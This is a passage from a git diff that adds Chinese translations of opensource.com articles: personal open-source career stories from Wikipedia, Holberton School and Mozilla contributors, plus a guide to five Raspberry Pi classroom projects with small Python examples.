+不到一年后,在 2015 年 12 月,我成为了互联网和社会中心[获取知识计划][19](CIS-A2K 运动)的项目助理。我自豪的时刻之一是在普里的研讨会,我们给印度带来了 20 位新的维基人,来编辑奥迪亚维基媒体社区。现在,我在指导普里的一个非正式聚会小组 [WikiTungi][20]。我和这个小组一起工作,把奥迪亚语的维基语录(wikiquotes)变成一个真实的计划项目。在奥迪亚维基,我也致力于缩小性别差距。[八位女性编辑][21]正在帮助组织聚会和研讨会,并参加了 [Women's History month edit-a-thon][22]。
+
+在我四年短暂而激动人心的旅程之中,我也参与了[维基百科的教育项目][23]、[通讯团队][24],以及两个全球性的 edit-a-thon:[Art and Feminism][25] 和 [Menu Challenge][26]。我期待着更多的到来!
+
+我还要感谢 [Sameer][27] 和 [Anna][28](都是之前维基百科教育计划的成员)。
+
+------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/4/my-open-source-story-sailesh-patnaik
+
+作者:[Sailesh Patnaik][a]
+译者:[译者ID](https://github.com/hkurj)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/saileshpat
+[1]: https://en.wikipedia.org/wiki/Odia_language
+[2]: https://en.wikipedia.org/wiki/Odisha
+[3]: https://en.wikipedia.org/wiki/Bangladesh_Liberation_War
+[4]: https://or.wikipedia.org/s/d2
+[5]: https://or.wikipedia.org/s/toq
+[6]: https://commons.wikimedia.org/wiki/Commons:The_Rathyatra_Challenge
+[7]: http://cis-india.org/openness/blog-old/odia-wikipedia-meets-google-developer-group
+[8]: http://perception.cetb.in/events/odia-wikipedia-event/
+[9]: https://opencon2015kolkata.sched.org/speaker/sailesh.patnaik007
+[10]: https://meta.wikimedia.org/wiki/Bengali_Wikipedia_10th_Anniversary_Celebration_Kolkata
+[11]: https://www.facebook.com/vishnu.vardhan.50746?fref=ts
+[12]: http://cis-india.org/
+[13]: https://meta.wikimedia.org/wiki/CIS-A2K/Events/Train_the_Trainer_Program/2015
+[14]: https://en.wikipedia.org/wiki/Wikipedia:GLAM
+[15]: https://www.facebook.com/ravidreams?fref=ts
+[16]: https://commons.wikimedia.org/wiki/Commons:Wiki_Loves_Food
+[17]: https://meta.wikimedia.org/wiki/WikiConference_India_2016
+[18]: https://or.wikipedia.org/s/sml
+[19]: https://meta.wikimedia.org/wiki/CIS-A2K
+[20]: https://or.wikipedia.org/s/xgx
+[21]: https://or.wikipedia.org/s/ysg
+[22]: https://or.wikipedia.org/s/ynj
+[23]: https://outreach.wikimedia.org/wiki/Education
+[24]: https://outreach.wikimedia.org/wiki/Talk:Education/News#Call_for_volunteers
+[25]: https://en.wikipedia.org/wiki/User_talk:Saileshpat#Barnstar_for_Art_.26_Feminism_Challenge
+[26]: https://opensource.com/life/15/11/tasty-translations-the-open-source-way
+[27]: https://www.facebook.com/samirsharbaty?fref=ts
+[28]: https://www.facebook.com/anna.koval.737?fref=ts
diff --git a/translated/talk/my-open-source-story/20160429 Why and how I became a software engineer.md b/translated/talk/my-open-source-story/20160429 Why and how I became a software engineer.md
new file mode 100644
index 0000000000..2e024c33bf
--- /dev/null
+++ b/translated/talk/my-open-source-story/20160429 Why and how I became a software engineer.md
@@ -0,0 +1,101 @@
+我成为一名软件工程师的原因和经历
+==========================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/myopensourcestory.png?itok=6TXlAkFi)
+
+1989 年乌干达首都,坎帕拉。
+
+赞美我的父母,他们机智的把我送到叔叔的办公室,去学着用电脑,而非将我留在家里添麻烦。几日后,我和另外六、七个小孩,还有一台放置在与讲台相垂直课桌子上的崭新电脑,一起置身于 21 层楼高的狭小房间中。很明显我们还不够格去碰那家伙。在长达三周无趣的 DOS 命令学习后,终于迎来了这美妙的时光。终于轮到我来输 **copy doc.txt d:** 了。
+
+那奇怪的声音其实是将一个简单文件写入 5.25 英寸软盘的声音,但听起来却像音乐般美妙。那段时间,这块软盘简直成为了我的至宝。我把所有我可以拷贝的东西都放在上面了。然而,1989 年的乌干达,人们的生活十分正经,相较而言,捣鼓电脑、拷贝文件还有格式化磁盘就称不上正经。我不得不专注于自己的学业,这让我离开了计算机科学,走入了建筑工程学。
+
+在这些年里,我和同龄人一样,干过很多份工作也学到了许多技能。我教过幼儿园的小朋友,也教过大人如何使用软件,在服装店工作过,还在教堂中担任过付费招待。在我获取堪萨斯大学的学位时,我正在技术高管的手下做技术助理,其实也就听上去比较洋气,也就是搞搞学生数据库而已。
+
+当我 2007 年毕业时,这些技术已经变得不可或缺。建筑工程学的方方面面都与计算机科学深深地交织在一起,所以我们都在不经意间学了些简单的编程知识。我对这方面一直很着迷。但由于我不得不成为一位正经的工程师,所以我发展了一项私人爱好:写科幻小说。
+
+在我的故事中,我以我笔下的女英雄的形式存在。她们都是编程能力出众的科学家,总是在冒险的途中用自己的技术发明战胜那些坏蛋,有时这些发明还要在战斗中完成。我想出的这些“新技术”,一般基于真实世界中的发明,也有些来自我读过的科幻小说。这就意味着我需要了解这些技术的原理,而且我的研究使我有意无意地关注了许多有趣的 subreddit 和电子杂志。
+
+### 开源:巨大的宝库
+
+在我的经历中,那几周花在 DOS 命令上的时间仍然记忆犹新。这些年里,我在一些偏门的项目上耗费心血,占据了宝贵的学习时间。Geocities 向所有 Yahoo! 用户开放后,我就创建了一个网站,用于发布一些由我用小型数码相机拍摄的个人图片。我还随性地帮助家人和朋友解决他们遇到的电脑问题,同时也为教堂搭建了一个图书馆数据库。
+
+这意味着,我需要一直研究并尝试获取更多的信息,使它们变得更棒。上帝保佑,让互联网和开源砸在了我的面前。然后,30 天试用和 license 限制对我而言就变成了过去式。我可以完全不受这些限制,持续的使用 GIMP、Inkscape 和 OpenOffice。
+
+### 是时候正经了
+
+我很幸运,有商业伙伴看出了我故事中的奇妙。她也是个想象力丰富的人,对更高效、更便捷的互联这个世界,充满了各种美好的想法。我们根据我们以往成功道路中经历的痛点制定了解决方案,但执行却成了一个问题。我们都缺乏那种将产品带入生活的能力,每当我们试图将想法带到投资人面前时,都表现的尤为突出。
+
+我们需要学习编程。所以在 2015 年的夏末,我们踏上了征途,来到了 Holberton 学校的阶前。那是一所座落于旧金山由社区推进,基于项目教学的学校。
+
+一天早上,我的商业伙伴找到我,用她惯常的方式开始了一段对话——每当她有疯狂的想法想要拉我入伙时,她都会这样。
+
+**Zee**: Gloria,我想和你说点事,在拒绝前能先听我说完吗?
+
+**Me**: 不行。
+
+**Zee**: 我们想要申请一所学校的全栈工程师。
+
+**Me**: 什么?
+
+**Zee**: 就是这,看!就是这所学校,我们要申请这所学校学习编程。
+
+**Me**: 我不明白。我们不是正在网上学 Python 和…
+
+**Zee**: 这不一样。相信我。
+
+**Me**: 那…
+
+**Zee**: 还不相信吗?
+
+**Me**: 好吧…我看看。
+
+### 抛开偏见
+
+我看到的和我们在网上听说的几乎差不多。这简直太棒了,以至于让人觉得不太真实,但我们还是决定尝试一下,双脚起跳,看看结果如何。
+
+要成为学生,我们需要经历四个步骤,仅仅是针对才能和态度,无关学历和编程经历的筛选。筛选便是课程的开始,通过它我们开始学习与合作。
+
+根据我和我合作伙伴的经验,相比 Holberton 学校的申请流程,其他的申请流程实在是太无聊了。就像场游戏。如果你完成了一项挑战,你就能通往下一关,在那里有别的有趣的挑战正等着你。我们创建了 Twitter 账号,在 Medium 上写博客,为了创建网站而学习 HTML 和 CSS, 打造了一个充满活力的社区,虽然在此之前我们并不知晓有谁会来。
+
+在线社区最吸引人的就是,我们使用电脑的经验是多种多样的,而我们的背景和性别并不是创始人们(我们私下里称他们为“The Trinity(三位一体)”)做出选择的因素。大家只是喜欢聚在一块交流。我们都是通过学习编程来提升自己计算机技术的聪明人。
+
+相较于其他的的申请流程,我们不需要泄露很多的身份信息。就像我的商业伙伴,她的名字里看不出她的性别和种族。直到最后一个步骤,在视频聊天的时候, The Trinity 才知道她是一位有色人种女性。迄今为止,促使她达到这个程度的只是她的热情和才华。肤色和性别,并没有妨碍或者帮助到她。还有比这更酷的吗?
+
+我们获得录取通知书的那个晚上,我们知道我们的命运已经改变,我们获得了原先梦寐以求的生活。2016 年 1 月 22 日,我们来到巴特瑞大街(Battery Street)98 号,第一次见到了我们的小伙伴 [Hippokampoiers][2]。很明显,在见面之前,“The Trinity”就已经开始做一些令人激动的事了。他们已经聚集了一批形形色色的人,这些人都专注于成为全栈工程师,并为之乐此不疲。
+
+这所大学有种与众不同的体验。感觉每天都是向编程的一次竭力的冲锋。我们着手的工程,并不会有很多指导,我们需要使用一切我们可以使用的资源找出解决方案。[Holberton 学校][1] 的办学宗旨便是向学员提供,相较于我们已知而言,更为多样的信息渠道。MOOCs(大型开放式课程)、教程、可用的开源软件和项目,以及线上社区层出不穷,将我们完成项目所需要的知识全都衔接了起来。加之宝贵的导师团队来指导我们制定解决方案,这所学校变得并不仅仅是一所学校;我们已经成为了求学者的社区。任何对软件工程感兴趣并对这种学习方法感兴趣的人,我都十分推荐这所学校。下次开课在 2016 年 10 月,并且会接受新的申请。虽然会让人有些悲喜交加,但是那真的很值得。
+
+### 开源问题
+
+我最早使用的开源系统是 [Fedora][3],一个 [Red Hat][4] 赞助的项目。在与 IRC 中一名成员一番惊慌失措的交流后,她推荐了这款免费的系统。 虽然在此之前,我还未独自安装过操作系统,但是这激起了我对开源的兴趣和日常使用计算机时对开源软件的依赖性。我们提倡为开源贡献代码,创造并使用开源的项目。我们的项目就在 Github 上,任何人都可以使用或是向它贡献出自己的力量。我们也会使用或以自己的方式为一些既存的开源项目做出贡献。在学校里,我们使用的大部分工具是开源的,例如 Fedora、[Vagrant][5]、[VirtualBox][6]、[GCC][7] 和 [Discourse][8],仅举几例。
+
+重回软件工程师之路以后,我始终憧憬着有这样一个时刻——能为开源社区做出一份贡献,能与他人分享我所掌握的知识。
+
+### 多样性的重要性
+
+站在教室里,在 29 双明亮的眼睛的注视下交流心得,真是令人陶醉。学员中有 40% 是女性,有 44% 是有色人种。当你是一位有色人种女性,并身处这个以缺乏多样性而著称的领域时,这些数字就变得非常重要了。那是高科技圣地麦加上的一片绿洲,我知道我做到了。
+
+想要成为一个全栈的工程师是十分困难的,你甚至很难了解这意味着什么。这是一条充满挑战的路途,道路四周布满了对收获的未知。科技推动着未来飞速发展,而你也是美好未来很重要的一部分。虽然媒体在持续的关注解决科技公司的多样化的问题,但是如果能认清自己,了解自己,知道自己为什么想成为一名全栈工程师,这样你便能觅得一处生根发芽。
+
+不过可能最重要的是,提醒人们女性在计算机的发展史上扮演着多么重要的角色,以帮助更多的女性回归到科技界,并使她们充满期待,而非对自己的性别与能力感到犹豫。她们的才能将会描绘出不仅仅是科技的未来,而是整个世界的未来。
+
+
+------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/4/my-open-source-story-gloria-bwandungi
+
+作者:[Gloria Bwandungi][a]
+译者:[martin2011qi](https://github.com/martin2011qi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/nappybrain
+[1]: https://www.holbertonschool.com/
+[2]: https://twitter.com/hippokampoiers
+[3]: https://en.wikipedia.org/wiki/Fedora_(operating_system)
+[4]: https://www.redhat.com/
+[5]: https://www.vagrantup.com/
+[6]: https://www.virtualbox.org/
+[7]: https://gcc.gnu.org/
+[8]: https://www.discourse.org/
diff --git a/translated/talk/my-open-source-story/20160505 A daughter of Silicon Valley shares her 'nerd' story.md b/translated/talk/my-open-source-story/20160505 A daughter of Silicon Valley shares her 'nerd' story.md
new file mode 100644
index 0000000000..279a7fd843
--- /dev/null
+++ b/translated/talk/my-open-source-story/20160505 A daughter of Silicon Valley shares her 'nerd' story.md
@@ -0,0 +1,82 @@
+”硅谷的女儿“的天才故事
+=======================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/myopensourcestory.png?itok=6TXlAkFi)
+
+在 2014 年,为了回应网上一些关于女性在科技行业的缺失的评论,我的同事 [Crystal Beasley][1] 发起了一个活动,让在科技/信息安全方面工作的女性在网络上分享自己的“天才之路”。这篇文章就是我的故事。我把我的故事与你们分享,是因为我相信榜样的力量,也因为我相信,一个人可以通过很多种方式,进入一份让自己满意且有挑战性的工作,过上实现了所有目标的人生。
+
+### 和电脑相伴的童年
+
+我,在其他的光环之外,还是硅谷的女儿。我的故事不是一个观众变成舞台主角的故事,也不是一个从小就为这份事业做贡献的故事。这个故事更多的是关于环境如何塑造你——通过它已然存在的文化来改变你,如果你愿意被改变的话。这不是一个从小就开始努力并为一个明确的目标而奋斗的故事。我知道,这是一个关于特权的故事。
+
+我出生在曼哈顿,但是我在新泽西州长大,因为我的爸爸作为一个退伍军人,在那里的罗格斯大学攻读计算机科学的博士学位。当我四岁时,学校里有人问我我的爸爸干什么谋生时,我说,“他就是看电视和捕捉小虫子,但是我从没有见过那些小虫子”(译者注:小虫子,bug)。他在家里有一台哑终端,这大概与他在博尔特-贝拉尼克-纽曼公司的工作有关,他会通过早期的互联网来进行他在人工智能方面的工作。我就在旁边看着。
+
+我没能玩上父亲那台会抓小虫子的电视,但是我很早就接触到了技术领域,我很珍惜这个礼物。提早的熏陶对于一个未来的天才是十分必要的——所以,请花时间和你的小孩谈谈你是做什么的!
+
+![](https://opensource.com/sites/default/files/resize/moss-520x433.png)
+
+>我父亲的终端和这个很类似——说不定就是同一款 CC BY-SA 4.0
+
+当我六岁时,我们搬到了加州。父亲在施乐的研究中心找到了一个工作。我记得那时我认为这个城市一定有很多熊,因为在它的旗帜上都有一个熊。在1979年,帕洛阿尔托还是一个大学城,还有果园和开阔地带。
+
+在帕洛阿尔托的公立学校待了一年之后,我的姐姐和我被送到了“半岛学校”,这所“模范学校”对我产生了深刻的影响。在那里,好奇心和创新意识是被推崇的,教育也是由学生自己决定的。我们很少在学校看到能叫做电脑的东西,但是在家就不同了。
+
+在父亲从施乐辞职之后,他去了苹果,在那里他参与研发——并带回家让我玩的第一批电脑是:Apple II 和 LISA。我的父亲是最初的 LISA 研发团队的一员。我直到现在还深刻地记得他让我们一次又一次地“玩鼠标”的场景,因为他想让我 3 岁大的妹妹适应这个东西——她也确实做到了。
+
+![](https://opensource.com/sites/default/files/resize/600px-apple_lisa-520x520.jpg)
+
+>我们的 LISA 看起来就像这样,看到鼠标了吗?CC BY-SA 4.0
+
+在学校,我的数学概念学得不错,但是基本计算却惨不忍睹。我最初的学校老师告诉我的家长,还有我,说我的数学很差,还说我很“笨”。虽然我在“常规的”数学课程中表现出色,能理解一个 7 岁的孩子能理解的逻辑谜题,但是我不能完成我们每天早上都要做的“练习”。她说我笨,这件事我不会忘记。在那之后的十年,我都没能相信自己的逻辑能力和算法水平。不要低估你对孩子说的话的力量。
+
+在我玩了几年爸爸的电脑之后,他从苹果跳到了 EA,又跳到了 SGI,我也体验了他带回来的新玩意。这让我们认为我们家是镇里最酷的,因为我们在车库里有一台能玩 Doom 的 SGI 机器。我那时不怎么编程,但是现在我发现,在那些年里,我对尝试新的科技不再恐惧。同时,我那学文学和教育的母亲,成为了一个科技行业的作家,她向我证实了一个人的职业可以改变,以及科技行业的人也可以做母亲。我不是说这对她来说很简单,但是她让这件事看起来很简单。你可能会想,这些早期的熏陶应该能把我带到科技行业,但是它没有。
+
+### 本科时光
+
+我曾想成为一个小学教师,我就读米尔斯学院就是想要做这个。但是后来我开始研究女性学,后来又研究神学。我这样做仅仅是出于我自己的一个渴求:我希望能理解人类的意志,以及为更好的世界而努力。
+
+同时,我也感受到了互联网的巨大力量。在 1991 年,拥有自己的 UNIX 账户是很令人高兴的事,这件事值得你向全世界的人吹嘘。我仅仅从在互联网上“玩”就学到了不少,从那些愿意回答我提出的问题的人那里学到的就更多了。这些学习对我职业生涯的影响,不亚于我在学校教育中学到的知识。没有无用的信息。我在一个女子学院度过了影响我一生的关键时期,而管理那所学院计算机系的是一位杰出的女性,我不认为这是一个巧合。在那所学院,我们不只是被允许,甚至是被鼓励去尝试很多的道路(我们能接触到很多很多的科技,还有聪明人供我们求助),我也确实那样做了。我十分感激当年的教育。在那所学院,我也了解了什么是极客文化。
+
+之后我去了研究生院学习女权主义神学,但是技术行业的气息已经渗入我的灵魂。当我知道我不能成为一个教授或者一个专家时,我离开了学术圈,带着债务和很多点子回到了家。
+
+### 新的开端
+
+在 1995 年,我被我所看见的万维网连接人们、分享想法和信息的能力所震惊(直到现在仍是如此),我想要进入这个行业。看起来我好像要“女承父业”,但是我不知道我会用什么方式来这样做。我开始在硅谷做临时工,做过一些杂事(为数据录入写最基础的数据库、技术手册付印前的准备、备份工资单的存根),之后我在太阳微系统公司得到了我的第一个“技术”职位。这些事很让人激动。(毕竟,我们是“.com”中的那个“点”)。
+
+在 Sun,我努力学习,尽可能多地尝试新事物。我的第一个工作是将论文做成网页(webify,没错,这是一个词),以及为测试中的 Solaris 修改一些基础的服务工具(大多数是 Perl 写的)。后来在 Open Solaris 测试版运行时,我最终感受到了开源的力量。
+
+在那里我学到了一件很重要的事情。我发现,在一个同样重视工程和教育的地方,有一种气氛,让我的问题不再显得“傻”。我很庆幸我选对了导师和朋友。在决定为第二个孩子的出生休产假之前,我上了每一堂我能上的课程,读了每一本我能读的书,尝试自学我在学校没有学习过的技术、商业以及项目管理方面的技能。
+
+### 重回工作
+
+当我准备重新工作时,Sun 已经不是一个值得回去的地方。所以,我收集了很多人的信息(人脉是你的朋友),利用我的沟通技能,最终帮助建立了一个互联网门户(2005 年时,一切皆门户),并且开始了解 CRM、产品发布方式、本地化、网络等知识。我这么做是基于我过去的尝试以及失败的经历所得出的教训,也是这些教训让我成功。我也认为我们需要这个方面的榜样。
+
+从很多方面来看,我职业生涯的第一部分就是我在技术上的自我教育。这件事发生的时间和地点都和现在不一样——我曾在帮助女性和其他弱势群体的组织工作,但之后我成为了一名技术行业的女性。当时的我,无疑没有看到这个行业的缺陷,而如今这个行业对女性的敌意是增加了,而不是减少了。
+
+在这些事情之后,我还没有把自己当作一个榜样,或者一个高级技术人员。当我在父母圈子里认识的一位极客朋友,鼓励我去申请一个看起来定位十分模糊且技术性很强的开源非盈利基础设施商店——互联网系统协会(ISC,它是广泛部署的开源 DNS 服务器 BIND 的开发商,也是 13 台 DNS 根域名服务器之一的运营商)的项目经理职位时,我很震惊。有很长一段时间,我都不知道他们为什么要雇佣我!我对 DNS、基础设施以及相关协议的开发知之甚少,但是我再次遇到了好老师,并再度开始飞速发展。我花时间旅行、参与关键流程的攻关、搞清楚如何与高度国际化的团队合作、解决麻烦的问题,最重要的是,拥抱开源和支撑着我们的充满活力的社区。我几乎通过试错的方式重新学了一切:如何构思一个产品,如何通过建设开源社区,来领导那些有着特定才能、技术和耐心的人——是他们给了产品价值。
+
+### 成为别人的导师
+
+当我在 ISC 工作时,我通过 [TechWomen 项目][2](一个将中东和北非科技行业的女性带到硅谷来接受指导的计划),开始喜欢上指导学生以及支持女性,特别是那些在开源行业中奋斗的女性。这也是我开始相信自己能力的开端。我还需要学很多。
+
+当我第一次读 TechWomen 的广告时,我认为那些导师甚至都不会想要和我说话!我有冒名顶替综合征。当他们邀请我成为第一批导师(以及以后 6 年的导师)时,我很震惊,但是现在我学会了相信这些都是我努力得到的待遇。冒名顶替综合征是真实的,但是它能被时间冲淡。
+
+### 现在
+
+最后,我不得不离开我在 ISC 的工作。幸运的是,我的工作以及我的价值让我进入了 Mozilla,在这里,我的努力和我的运气让我发挥着重要的作用。现在,我是一名负责多样性与包容的高级项目经理。我致力于构建一个更多样化、更有包容性的 Mozilla,站在之前做同样事情的巨人的肩膀上,与最聪明友善的人们一起工作。我用我的激情来让人们找到为这个世界所需要的互联网做贡献的有意义的方式:这让我兴奋了很久。我能看见,我做到了!
+
+通过对组织和个人行为的干预,用一种新的方法来改变一种文化,这件事情和我的人生有着十分奇妙的联系——从我早期的学术生涯,到职业生涯,再到现在。每天都是一个新的挑战,我想这正是我最喜欢在科技行业,尤其是在开放互联网领域工作的原因。互联网天然的多元性是它最开始吸引我的原因,也是我仍在追求的——让所有人无论背景如何,都有获取资源的可能。榜样、导师、资源,以及最重要的,对不断发展的技术和开源文化的尊重,能够实现我相信它们能实现的事——包括给任何人平等的接入权和机会。
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/5/my-open-source-story-larissa-shapiro
+
+作者:[Larissa Shapiro][a]
+译者:[name1e5s](https://github.com/name1e5s)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/larissa-shapiro
+[1]: http://skinnywhitegirl.com/blog/my-nerd-story/1101/
+[2]: https://www.techwomen.org/mentorship/why-i-keep-coming-back-to-mentor-with-techwomen
diff --git a/translated/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md b/translated/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
new file mode 100644
index 0000000000..06191d551c
--- /dev/null
+++ b/translated/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
@@ -0,0 +1,98 @@
+5 个适合课堂教学的树莓派项目
+================================================================================
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/osdc-open-source-yearbook-lead3.png)
+
+图片来源:opensource.com
+
+### 1. Minecraft Pi ###
+
+![](https://opensource.com/sites/default/files/lava.png)
+
+上图由树莓派基金会提供。遵循 [CC BY-SA 4.0.][1] 协议。
+
+Minecraft(我的世界)几乎是世界上每个青少年都极其喜爱的游戏 —— 在吸引年轻人注意力方面,它也是最具创意的游戏之一。每个树莓派都自带的这个版本不仅仅是一个激发创造性思维的建造游戏,它还带有一个编程接口,允许使用者通过 Python 代码来与 Minecraft 世界进行互动。
+
+对于教师来说,Minecraft: Pi 版本是一个鼓励学生解决问题、通过编写代码来执行特定任务的极好方式。你可以使用 Python API 来建造一所房子,让它跟随你到任何地方;或在你所到之处修建一座桥梁;又或者是下一场岩浆雨;或在天空中显示温度;以及其他任何你能想像到的事物,比如下面的小例子。
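+
+下面是一个基于 mcpi 库的最小示意(假设树莓派上已打开 Minecraft Pi 并进入了游戏世界,放置的方块类型仅作演示):
+
+```python
+from mcpi.minecraft import Minecraft
+from mcpi import block
+
+mc = Minecraft.create()                 # 连接到本机正在运行的 Minecraft Pi
+mc.postToChat("Hello, Minecraft Pi!")   # 在游戏聊天栏中显示一条消息
+
+pos = mc.player.getTilePos()            # 获取玩家当前所在的方块坐标
+# 在玩家脚下放置一块钻石块
+mc.setBlock(pos.x, pos.y - 1, pos.z, block.DIAMOND_BLOCK.id)
+```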
+
+可在 "[Minecraft Pi 入门][2]" 中了解更多相关内容。
+
+### 2. 反应游戏和交通指示灯 ###
+
+![](https://opensource.com/sites/default/files/pi_traffic_installed_yellow_led_on.jpg)
+
+上图由 [Low Voltage Labs][3] 提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+在树莓派上进行物理计算是非常容易的 —— 只需将 LED 灯和按钮连接到 GPIO 针脚上,再加上少量的代码,你就可以点亮 LED 灯并通过按钮来控制物体。一旦你掌握了执行基本操作的代码,接下来就可以随你的想象去发挥了!
+
+假如你知道如何让一盏灯闪烁,你就可以让三盏灯闪烁。选出三盏交通灯颜色的 LED 灯,你就可以编写出交通灯的闪烁序列。假如你知道如何用一个按钮触发一个事件,那么你就有一个人行横道了!同时,你还可以找到诸如 [PI-TRAFFIC][4]、[PI-STOP][5]、[Traffic HAT][6] 等预先构建好的交通灯插件。
+
+这不仅仅是关于代码 —— 它还可以作为一个练习,用来理解真实世界中的系统是如何被设计出来的。计算思维在生活中的各种情景下都是一项有用的技能。
+
+![](https://opensource.com/sites/default/files/reaction-game.png)
+
+上图由树莓派基金会提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+下面尝试将两个按钮和一个 LED 灯连接起来,制作一个双人反应游戏 —— 让灯在一段随机时间后点亮,然后看谁先按下按钮(可参考下面的示意代码)!
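+
+这里给出一个基于 gpiozero 库的简单示意(引脚编号仅为假设,请按实际接线修改):
+
+```python
+from gpiozero import LED, Button
+from time import sleep
+from random import uniform
+
+led = LED(17)        # 假设 LED 接在 GPIO 17
+left = Button(14)    # 假设两个按钮分别接在 GPIO 14 和 15
+right = Button(15)
+
+sleep(uniform(5, 10))   # 随机等待 5 到 10 秒
+led.on()                # 点亮 LED,比赛开始
+
+# 轮询检测:先按下按钮的一方获胜
+while True:
+    if left.is_pressed:
+        print("左边的玩家赢了!")
+        break
+    if right.is_pressed:
+        print("右边的玩家赢了!")
+        break
+```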
+
+想了解更多的话,请查看 [GPIO 新手指南][7]。你所需要的尽在 [CamJam EduKit 1][8]。
+
+### 3. Sense HAT 像素宠物 ###
+
+Astro Pi —— 一个增强版的树莓派 —— 将于今年 12 月(译注:应该是去年的事了)问世,但你不必等到那时才能接触到它的硬件。Sense HAT 是 Astro Pi 任务中使用的感应器扩展板,任何人都可以买到。你可以用它来做数据收集、科学实验、游戏或者更多。观看下面这个由树莓派基金会的 Carrie Anne 带来的 Gurl Geek Diaries 视频,开始一段美妙的旅程吧 —— 在 Sense HAT 的显示屏上展示出你自己设计的动物像素宠物:
+
+注:youtube 视频
+
+
+在 "[探索 Sense HAT][9]" 中可以学到更多。
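+
+作为参考,下面是一个用 sense-hat 库在 8x8 LED 点阵上画出简单像素图案的示意(图案和颜色仅作演示):
+
+```python
+from sense_hat import SenseHat
+
+sense = SenseHat()
+
+b = (0, 0, 0)        # 黑色背景
+y = (255, 255, 0)    # 黄色
+# 8x8 共 64 个像素,拼出一个简单的“笑脸”宠物
+pixels = [
+    b, b, b, b, b, b, b, b,
+    b, y, y, b, b, y, y, b,
+    b, y, y, b, b, y, y, b,
+    b, b, b, b, b, b, b, b,
+    b, y, b, b, b, b, y, b,
+    b, b, y, y, y, y, b, b,
+    b, b, b, b, b, b, b, b,
+    b, b, b, b, b, b, b, b,
+]
+sense.set_pixels(pixels)
+```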
+
+### 4. 红外鸟箱 ###
+
+![](https://opensource.com/sites/default/files/ir-bird-box.png)
+
+上图由 [Low Voltage Labs][3] 提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+一个能让全班所有同学都参与进来的好练习是:在一个鸟箱中放置一个树莓派和 NoIR 摄像头模块,并装上一些红外灯,这样你就可以在黑暗中拍摄,然后通过网络从树莓派获取实时视频流。等鸟进入鸟箱后,你就可以在不打扰它们的情况下观察它们。
+
+在这期间,你可以学习到关于红外线和光谱的知识,以及如何用软件调整摄像头的焦距并控制它(可参考下面的示意代码)。
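+
+下面是一个用 picamera 库录制一段视频的最小示意(文件名和时长仅作演示,假设已接好 NoIR 摄像头模块):
+
+```python
+from picamera import PiCamera
+from time import sleep
+
+camera = PiCamera()
+camera.resolution = (1280, 720)
+
+camera.start_recording('birdbox.h264')  # 开始录制并写入本地文件
+sleep(60)                               # 持续录制 60 秒
+camera.stop_recording()
+```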
+
+在 "[制作一个红外鸟箱][10]" 中你可以学到更多。
+
+### 5. 机器人 ###
+
+![](https://opensource.com/sites/default/files/edukit3_1500-alex-eames-sm.jpg)
+
+上图由 Low Voltage Labs 提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+拥有一个树莓派、一些电机和一块电机控制电路板,你就可以构建你自己的机器人。可以制作的机器人种类繁多:从用透明胶带把自制底盘粘在一起的简易四驱车,一直到由游戏手柄驱动、具有自我意识、带有传感器和摄像头的金属猛兽。
+
+你可以学习如何直接控制单个电机,例如使用 RTK Motor Controller Board(8 英镑/12 美元);或者尝试新的 CamJam robotics kit(17 英镑/25 美元),它带有电机、轮子和一系列传感器 —— 物美价廉,而且很有学习价值。下面给出一个控制思路的示意。
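+
+作为参考,这是一个用 gpiozero 的 Robot 类驱动两个电机的简单示意(引脚编号取决于电机驱动板的接线,这里仅为假设):
+
+```python
+from gpiozero import Robot
+from time import sleep
+
+# left/right 分别是驱动左右电机的两个 GPIO 引脚
+robot = Robot(left=(4, 14), right=(17, 18))
+
+robot.forward()   # 两个电机同时向前
+sleep(1)
+robot.left()      # 原地左转
+sleep(0.5)
+robot.stop()
+```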
+
+另外,如果你喜欢更为骨灰级的东西,可以尝试 PiBorg 的 [4Borg][11](99 英镑/150 美元)或 [DiddyBorg][12](180 英镑/273 美元),或者一步到位,入手他们的 DoodleBorg 金属版(250 英镑/380 美元),并构建一个他们声名远扬的 [DoodleBorg 坦克][13](很不幸,这个没有卖的)的迷你版。
+
+另外请参考 [CamJam robotics kit worksheets][14]。
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/education/15/12/5-great-raspberry-pi-projects-classroom
+
+作者:[Ben Nuttall][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/bennuttall
+[1]:https://creativecommons.org/licenses/by-sa/4.0/
+[2]:https://opensource.com/life/15/5/getting-started-minecraft-pi
+[3]:http://lowvoltagelabs.com/
+[4]:http://lowvoltagelabs.com/products/pi-traffic/
+[5]:http://4tronix.co.uk/store/index.php?rt=product/product&product_id=390
+[6]:https://ryanteck.uk/hats/1-traffichat-0635648607122.html
+[7]:http://pythonhosted.org/gpiozero/recipes/
+[8]:http://camjam.me/?page_id=236
+[9]:https://opensource.com/life/15/10/exploring-raspberry-pi-sense-hat
+[10]:https://www.raspberrypi.org/learning/infrared-bird-box/
+[11]:https://www.piborg.org/4borg
+[12]:https://www.piborg.org/diddyborg
+[13]:https://www.piborg.org/doodleborg
+[14]:http://camjam.me/?page_id=1035#worksheets
